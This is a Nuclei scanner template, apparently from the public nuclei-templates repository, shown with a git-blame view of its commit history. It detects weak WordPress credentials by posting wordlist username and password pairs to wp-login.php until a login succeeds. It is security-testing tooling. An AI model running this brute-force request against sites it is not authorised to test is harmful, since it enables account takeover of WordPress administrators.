nuclei-templates/http/fuzzing/wordpress-weak-credentials....

id: wordpress-weak-credentials

info:
  name: WordPress - Weak Credentials
  author: evolutionsec
  severity: critical
  description: |
    Weak WordPress Credentials were discovered.
  reference:
    - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-1391
  metadata:
    max-request: 276
  tags: wordpress,default-login,fuzz

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}

        log={{users}}&pwd={{passwords}}

    attack: clusterbomb
    payloads:
      users: helpers/wordlists/wp-users.txt
      passwords: helpers/wordlists/wp-passwords.txt
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '/wp-admin'
          - 'wordpress_logged_in'
        condition: and

      - type: status
        status:
          - 302
# digest: 4b0a00483046022100f4b2f86494cdb1411f0c19cbac344d94815bb9e449db98c98c39ad31b83f8eab0221008d7809b0cfc31bfd21c48fed09caf2ec26024d8c1a7c30874f65a7ec26f68fe9:922c64590222798bb761d5b6d8e72950
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00			`id: wordpress-weak-credentials`

			`info:`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`name: WordPress - Weak Credentials`
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00			`author: evolutionsec`
			`severity: critical`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`description: \|`
			`Weak WordPress Credentials were discovered.`
			`reference:`
			`- https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/`
			`classification:`
Dashboard Content Enhancements (#6613) Dashboard Content Enhancements 2023-01-24 16:21:18 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N`
			`cvss-score: 9.3`
			`cwe-id: CWE-1391`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 276`
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6. 2024-04-08 11:34:33 +00:00			`tags: wordpress,default-login,fuzz`
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00			`- raw:`
misc update 2021-08-23 11:52:29 +00:00			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{BaseURL}}`
			`Content-Type: application/x-www-form-urlencoded`
			`Referer: {{BaseURL}}`
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00
misc update 2021-08-23 11:52:29 +00:00			`log={{users}}&pwd={{passwords}}`
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00
Added fuzzing templates 2024-03-16 18:44:49 +00:00			`attack: clusterbomb`
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00			`payloads:`
			`users: helpers/wordlists/wp-users.txt`
			`passwords: helpers/wordlists/wp-passwords.txt`
Added stop-at-first-match in applicable templates 2021-09-02 11:59:10 +00:00			`stop-at-first-match: true`
templateman update 2023-10-14 11:27:55 +00:00
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`part: header`
Added WordPress Weak Credentials Detection 2021-08-23 11:50:33 +00:00			`words:`
			`- '/wp-admin'`
			`- 'wordpress_logged_in'`
			`condition: and`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00
			`- type: status`
			`status:`
			`- 302`
Auto Template Signing [Mon Apr 8 07:07:11 UTC 2024] :robot: 2024-04-08 07:07:11 +00:00			`# digest: 4b0a00483046022100f4b2f86494cdb1411f0c19cbac344d94815bb9e449db98c98c39ad31b83f8eab0221008d7809b0cfc31bfd21c48fed09caf2ec26024d8c1a7c30874f65a7ec26f68fe9:922c64590222798bb761d5b6d8e72950`